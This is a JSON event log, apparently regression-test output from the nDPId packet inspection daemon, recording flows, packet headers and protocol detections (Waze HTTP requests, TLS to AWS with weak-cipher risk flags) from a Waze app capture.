+00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587869162,"flow_last_seen":1435587869162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587869162,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1435587869162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587869162,"pkt":"ABoRAAACABoRAAABCABFAAA8XmhAAEAGt7gKCAABNubjrLHgAFDjpDJQAAAAAKAC\/\/\/u\/QAAAgQFtAQCCAoACGw4AAAAAAEDAwg="} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1435587869163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAodIRAABAG0bA25uOsCggAAQBQseAcW82v46QyUVAS\/\/\/ZBQAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1435587869163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAoXmlAAEAGt8sKCAABNubjrLHgAFDjpDJRHFvNsFAQ\/\/\/ZBgAA"} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587869162,"flow_last_seen":1435587869165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587869165,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587869162,"flow_last_seen":1435587869166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1435587869166,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":66,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868635,"flow_last_seen":1435587869425,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587869425,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868634,"flow_last_seen":1435587869476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587869476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
+01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587868635,"flow_last_seen":1435587869477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587869477,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587867755,"flow_last_seen":1435587871459,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1435587871459,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application 
Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":200,"content_type":"application\/octet-stream","user_agent":"Android"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871656,"flow_last_seen":1435587871656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871656,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1435587871656,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871656,"pkt":"ABoRAAACABoRAAABCABFAAA8\/jRAAEAGF+wKCAABNubjrLHiAFBcJZMGAAAAAKAC\/\/8UywAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1435587871657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871657,"pkt":"ABoRAAACABoRAAABCABFAAAodJ1AABAG0Zc25uOsCggAAQBQseKj2mz5XCWTB1AS\/\/\/ZAwAA"} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1435587871657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871657,"pkt":"ABoRAAACABoRAAABCABFAAAo\/jVAAEAGF\/8KCAABNubjrLHiAFBcJZMHo9ps+lAQ\/\/\/ZBAAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871658,"flow_last_seen":1435587871658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871658,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1435587871658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871658,"pkt":"ABoRAAACABoRAAABCABFAAA8NxhAAEAG3wgKCAABNubjrLHkAFDBi1oqAAAAAKAC\/\/\/oPgAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1435587871659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871659,"pkt":"ABoRAAACABoRAAABCABFAAAodJ5AABAG0ZY25uOsCggAAQBQseQ+dKXVwYtaK1AS\/\/\/ZAQAA"} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1435587871660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871660,"pkt":"ABoRAAACABoRAAABCABFAAAoNxlAAEAG3xsKCAABNubjrLHkAFDBi1orPnSl1lAQ\/\/\/ZAgAA"} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871656,"flow_last_seen":1435587871689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871689,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":108,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871656,"flow_last_seen":1435587871690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871918,"flow_last_seen":1435587871918,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871918,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1435587871918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871918,"pkt":"ABoRAAACABoRAAABCABFAAA8cIlAAEAGqJ4KCAABsCJnacdpAbv69x3BAAAAAKAC\/\/\/XPAAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1435587871929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871929,"pkt":"ABoRAAACABoRAAABCABFAAAodKhAABAG1JOwImdpCggAAQG7x2kFCOI++vcdwlAS\/\/\/FGAAA"} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871929,"flow_last_seen":1435587871929,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871929,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1435587871929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871929,"pkt":"ABoRAAACABoRAAABCABFAAA8KgBAAEAG7ycKCAABsCJnacdqAbskTkdIAAAAAKAC\/\/+EXgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1435587871932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871932,"pkt":"ABoRAAACABoRAAABCABFAAAodKlAABAG1JKwImdpCggAAQG7x2rbsbi3JE5HSVAS\/\/\/FFwAA"} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871935,"flow_last_seen":1435587871935,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1435587871935,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871935,"pkt":"ABoRAAACABoRAAABCABFAAA8\/WxAAEAGG7sKCAABsCJnacdrAbsTBZAkAAAAAKAC\/\/9MygAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1435587871938,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871938,"pkt":"ABoRAAACABoRAAABCABFAAAodKpAABAG1JGwImdpCggAAQG7x2vs+m\/bEwWQJVAS\/\/\/FFgAA"} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871939,"flow_last_seen":1435587871939,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871939,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1435587871939,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871939,"pkt":"ABoRAAACABoRAAABCABFAAA8xDRAAEAGxZIKCAABNBFy25hiAbudWal8AAAAAKAC\/\/9IxgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1435587871941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871941,"pkt":"ABoRAAACABoRAAABCABFAAAodKtAABAGRTA0EXLbCggAAQG7mGJiplaDnVmpfVAS\/\/9kvwAA"} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871941,"flow_last_seen":1435587871941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871941,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1435587871941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871941,"pkt":"ABoRAAACABoRAAABCABFAAA8RGdAAEAG0bkKCAABNubjrLHqAFALhykvAAAAAKAC\/\/\/PIgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1435587871943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871943,"pkt":"ABoRAAACABoRAAABCABFAAAodKxAABAG0Yg25uOsCggAAQBQser0eNbQC4cpMFAS\/\/\/Y+wAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAocIpAAEAGqLEKCAABsCJnacdpAbv69x3CBQjiP1AQ\/\/\/FGQAA"} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoKgFAAEAG7zoKCAABsCJnacdqAbskTkdJ27G4uFAQ\/\/\/FGAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAo\/W1AAEAGG84KCAABsCJnacdrAbsTBZAl7Ppv3FAQ\/\/\/FFwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoxDVAAEAGxaUKCAABNBFy25hiAbudWal9YqZWhFAQ\/\/9kwAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoRGhAAEAG0cwKCAABNubjrLHqAFALhykw9HjW0VAQ\/\/\/Y\/AAA"} 
